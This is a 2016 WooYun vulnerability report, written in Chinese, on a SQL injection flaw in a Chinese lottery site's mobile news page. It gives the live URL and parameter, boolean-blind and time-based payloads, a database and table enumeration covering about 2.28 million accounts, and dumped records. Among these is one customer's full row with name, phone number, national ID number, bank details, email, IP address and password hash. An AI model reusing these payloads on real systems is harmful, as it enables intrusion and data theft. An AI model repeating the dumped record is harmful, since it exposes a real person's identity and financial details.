漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0173372
漏洞标题:某CAIPIAO分站SQL注入导致228W交易帐号测漏
相关厂商:广东彩搜网络技术股份有限公司
漏洞作者: 路人甲
提交时间:2016-01-28 16:52
修复时间:2016-03-10 16:42
公开时间:2016-03-10 16:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某采彡PIAO分站SQL注入导致#228W交易帐号测漏(包括个人信息、账户余额)+余额可用/可购买
详细说明:
http://m.yicp.com/news/newslist.php?categoryId=15&pageNo=2
漏洞证明:
Place: GET
Parameter: categoryId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: categoryId=15 AND 7949=7949&pageNo=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: categoryId=15 AND SLEEP(5)&pageNo=2
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] tubiao
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
Database: caiso
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| business_wallet | 2284067 |
| business_email_log | 2283210 |
| business_customer | 2281872 |
| business_article | 376051 |
| business_term | 177302 |
| business_match_arrange | 42951 |
| business_wallet_log | 31784 |
| business_plan_item | 25498 |
| business_cps_day_report | 23884 |
| business_you_hui_ma | 22821 |
| business_ticket | 19871 |
| business_plan | 15115 |
| business_order | 14116 |
| business_prize_level | 13469 |
| business_sms_log | 7066 |
| business_payment_request | 6884 |
| activity_activity_detail | 5254 |
| business_part | 3374 |
| business_order_temp | 3256 |
| business_community | 3067 |
| business_chaseitem | 2636 |
| business_win_prize | 1275 |
| business_win_describe_ticket | 1010 |
| business_win_describe_order | 913 |
| business_back_money_request | 708 |
| business_chase | 539 |
| business_pay_out_request | 525 |
| admin_permissions | 340 |
| admin_role_function | 277 |
| business_print_term | 183 |
| business_article_inlink | 106 |
| business_feedback | 85 |
| admin_channel | 77 |
| business_article_category | 60 |
| business_spread_channel | 59 |
| admin_class | 40 |
| business_friendly_link | 37 |
| business_system_param | 28 |
| business_restricted | 22 |
| business_term_type_config | 21 |
账户余额
Table: business_wallet
[10 entries]
+------+--------+-------------------------------------------+---------+-----------+--------------+---------------+
| id | status | summary | balance | version | freeze_money | history_prize |
+------+--------+-------------------------------------------+---------+-----------+--------------+---------------+
| 1000 | 0 | f58e689b0081dbde2d34c540e6b5f48f | 10.23 | 178 | 5.00 | 0.00 |
| 1001 | 0 | b329391393230a8d4d055bc7fc9ca451 | 40.24 | 52 | 4.00 | 0.00 |
| 1002 | 0 | ffc3d18a6fccf2284e0b66efcccab237 | 174.90 | 231 | 9.00 | 0.00 |
| 1003 | 0 | 79d5cdcdd8ae7d673c93d3c4a5f611cf | 0.00 | 1 | 0.00 | 0.00 |
| 1004 | 0 | 5f0c856744ebf98152fc0e62912018a6 | 86.34 | 167 | 0.00 | 0.00 |
| 1005 | 0 | a66f96d93409f473f3d4484c6f868845 | 33.35 | 11 | 0.00 | 0.00 |
| 1006 | 0 | b61292dc9237be7741a69a24d5019632 (100600) | 0.00 | 1 | 0.00 | 0.00 |
| 1007 | 0 | 4d82760bb00a54316a6f939fd620744a (100700) | 0.00 | 1 | 0.00 | 0.00 |
| 1008 | 0 | fee4181443c7299d710d3036451418e4 | 0.00 | 1 | 0.00 | 0.00 |
| 1009 | 0 | f9e9c455c87f29309f7e2d32b70c4817 | 0.00 | 1 | 0.00 | 0.00 |
+------+--------+-------------------------------------------+---------+-----------+--------------+---------------+
Database: caiso
Table: business_customer
[1 entry]
+------+---------+----------+-----------+------------+-------------+--------------+---------------+---------------+-----+------+------+------+-------+------------------+--------+---------+---------+----------+----------------------------------+----------+----------+----------+-------------+-----------+-----------+-----------+-----------+-----------+-----------+--------------------+------------+------------+---------------------------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+---------------------------------+---------------------+---------------+---------------+---------------+---------------+---------------------+------------------+-------------------+-------------------+--------------------+
| id | open_id | user3_id | wallet_id | channel_id | superior_id | ssuperior_id | commission_id | admin_user_id | old | ask | city | bank | bound | email | status | is_pass | remarks | province | password | question | usr_type | is_apply | mobile_no | yanzhenma | login_num | bank_name | real_name | nick_name | subbranch | credent_no | sssuperior | reg_source | sms_accept | ploy_accur | super_ratio | customer_ip | reg_channel | bank_number | ssuper_ratio | credent_type | email_accept | register_time | ploy_consumed | sssuper_ratio | all_win_money | customer_type | last_login_time | super_commission | ssuper_commission | wake_up_email_num | sssuper_commission |
+------+---------+----------+-----------+------------+-------------+--------------+---------------+---------------+-----+------+------+------+-------+------------------+--------+---------+---------+----------+----------------------------------+----------+----------+----------+-------------+-----------+-----------+-----------+-----------+-----------+-----------+--------------------+------------+------------+---------------------------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+---------------------------------+---------------------+---------------+---------------+---------------+---------------+---------------------+------------------+-------------------+-------------------+--------------------+
| 1000 | NULL | NULL | 1000 | 11 | NULL | NULL | 1 | NULL | 0 | NULL | 广州 | 0 | bound | [email protected] | 1 | 1 | NULL | 广东 | 60C4D9185D2BA0717AB5EC2D32A7DBD6 | <blank> | 0 | <blank> | 13632725483 | 152005 | 323 | 彭方良 | 彭方良 | fabulous | 骏景支行 | 522422198309090818 | NULL | 2 | 0000000000000000000000000000000 | 0 | 0.03 | 183.6.176.106 | NULL | 612226 | 0.00 | NULL | 0000000000000000000000000000000 | 2013-12-03 10:34:58 | 0 | NULL | 916.84 | NULL | 2015-12-30 16:00:16 | 0.00 | 0.00 | NULL | NULL |
+------+---------+----------+-----------+------------+-------------+--------------+---------------+---------------+-----+------+------+------+-------+------------------+--------+---------+---------+----------+----------------------------------+----------+----------+----------+-------------+-----------+-----------+-----------+-----------+-----------+-----------+--------------------+------------+------------+---------------------------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+---------------------------------+---------------------+---------------+---------------+---------------+---------------+---------------------+------------------+-------------------+-------------------+--------------------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)